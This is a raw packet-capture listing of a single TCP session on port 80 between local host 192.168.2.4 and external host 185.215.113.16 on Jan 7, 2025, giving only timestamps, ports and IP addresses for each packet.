Jan 7, 2025 10:08:20.893402100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893434048 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894027948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894053936 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894064903 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894079924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894110918 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894120932 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894170046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894181967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894191980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894201994 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894212008 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894241095 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894315004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894326925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894337893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894361019 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894366026 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894402981 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894421101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894433022 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894506931 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894530058 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894541979 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894551992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894563913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894577026 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894598007 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894723892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894740105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894752979 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894764900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894792080 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894804955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894818068 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894824982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894835949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894849062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894855976 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894860029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894903898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894952059 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894963026 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894978046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.894985914 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.894989014 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.895001888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.895014048 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.895041943 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.895055056 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.895066977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.895100117 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016290903 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016308069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016325951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016336918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016345978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016357899 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016369104 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016376972 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016413927 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016454935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016464949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016474962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016505957 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016518116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016525984 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016530991 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016551018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016571999 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016606092 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016618967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016657114 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016669035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016680956 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016710997 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016777039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016788960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016799927 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016824007 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016843081 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016848087 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016864061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016901970 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016911983 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.016921043 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.016951084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.017034054 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017100096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017108917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017129898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017144918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017157078 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.017180920 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.017184973 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017204046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017214060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017242908 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.017255068 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.017335892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017349005 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017359972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017369986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017379999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017407894 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.017577887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017640114 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.017652988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017664909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017676115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.017700911 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018232107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018243074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018254042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018291950 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018311977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018322945 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018323898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018335104 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018376112 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018467903 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018479109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018487930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018523932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018524885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018537045 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018548965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018559933 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018568993 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018568993 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018599987 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018683910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018696070 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018706083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018726110 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018735886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018747091 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018758059 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018779039 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.018812895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.018821955 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.019332886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019345045 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019355059 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019366026 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019377947 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019393921 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.019433022 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019433022 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.019447088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019457102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019499063 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019555092 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019556999 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.019565105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019601107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019612074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019612074 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.019623041 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019634008 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019648075 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.019668102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.019798994 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019810915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019821882 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019833088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019843102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.019859076 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.019872904 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.020009041 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020030022 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020040035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020051956 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.020077944 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.020172119 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020179987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020185947 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020211935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020225048 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.020226002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020250082 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.020318985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020330906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020342112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020355940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020359993 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.020368099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020379066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.020384073 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.020406961 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.141562939 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141596079 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141608000 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141613007 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.141649961 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.141649961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141664028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141674042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141700983 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.141711950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141722918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141731977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141742945 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141753912 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.141779900 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.141844988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141855955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141865969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141879082 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.141890049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.141931057 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142028093 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142040014 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142051935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142061949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142071962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142079115 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142083883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142096043 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142122984 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142163992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142174006 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142184019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142205000 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142227888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142230988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142242908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142256021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142276049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142388105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142398119 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142407894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142417908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142426968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142429113 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142457008 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142458916 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142468929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142481089 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142518044 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142556906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142566919 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142602921 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142673969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142683029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142693043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.142723083 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142738104 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.142780066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143477917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143491983 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143505096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143515110 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143537045 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.143573046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143584013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143594980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143606901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143610001 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.143630981 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.143722057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143747091 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143757105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143768072 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143775940 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.143779039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143790007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143800020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.143807888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.143840075 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144017935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144027948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144037962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144047976 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144058943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144072056 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144088030 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144236088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144247055 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144257069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144284010 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144309044 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144314051 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144324064 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144335032 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144364119 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144673109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144684076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144692898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144721031 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144733906 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144821882 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144831896 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144841909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144881964 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144927979 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144937992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144948959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.144980907 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.144998074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145031929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145042896 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145077944 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.145152092 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145214081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145224094 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145245075 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.145294905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145304918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145318031 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145343065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145348072 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.145356894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145400047 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.145426989 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145438910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145448923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145467043 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.145481110 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.145519018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145534039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145544052 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.145575047 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.230015039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.230034113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.230072975 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.266679049 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266694069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266712904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266726017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266748905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266751051 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.266761065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266767025 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266796112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266805887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266808987 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.266808987 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.266818047 CET	80	49884	185.215.113.16	192.168.2.4
